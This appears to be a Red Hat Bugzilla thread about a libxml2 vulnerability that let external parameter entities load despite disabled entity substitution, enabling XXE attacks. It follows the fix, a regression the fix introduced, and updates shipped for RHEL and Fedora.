It was discovered that libxml2 loaded external parameter entities even when entity substitution was disabled. A remote attacker able to provide a specially crafted XML file to an application linked against libxml2 could use this flaw to conduct XML External Entity (XXE) attacks, possibly resulting in a denial of service or an information leak on the system.
It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substituton in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.
This issue was discovered by Daniel P. Berrange of Red Hat.
This issue is related to the handling of external parameter entities. Even when libxml2 was instructed to parse XML document without preforming entity substitutions (i.e. when parser was run without the XML_PARSE_NOENT option, which is the default), libxml2 loaded external entities, which could lead to some XML eXternal Entities (XXE) attacks.
Similar problem was previously corrected in libxml2 for general entities via:
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Via RHSA-2014:0513 https://rhn.redhat.com/errata/RHSA-2014-0513.html
Ubuntu just released http://www.ubuntu.com/usn/usn-2214-2/ to note a regression in the upstream fix for this issue, described as:
USN-2214-1 fixed vulnerabilities in libxml2. The upstream fix introduced a
regression when using xmllint with the --postvalid option. This update
fixes the problem.
Given that we have fixed in RHEL6, do we suffer from the same regression? See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a patch attached (presumably what was used in Ubuntu); also see the upstream report here:
Vincent, I think we do have the same regression. See https://bugzilla.redhat.com/show_bug.cgi?id=1104864 .
Created libxml2 tracking bugs for this issue:
Affects: fedora-all [bug 1107556]
Created mingw-libxml2 tracking bugs for this issue:
Affects: fedora-all [bug 1107557]
(In reply to Vincent Danen from comment #22)
> Given that we have fixed in RHEL6, do we suffer from the same regression?
> See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and
> https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a
> patch attached (presumably what was used in Ubuntu); also see the upstream
> report here:
This is a bug we've introduced with this security patch, but from what I can tell it's not a new security issue. As Michael Chapman pointed out in comment 24, this is already being handled in bug 1104864.
Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.
Created mingw32-libxml2 tracking bugs for this issue:
Affects: epel-7 [bug 1191425]
Bug 915149 comment 8 has notes on related issue that affected general external entities.
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2015:0749 https://rhn.redhat.com/errata/RHSA-2015-0749.html
libxml2-2.9.1-7.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
libxml2-2.9.1-4.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.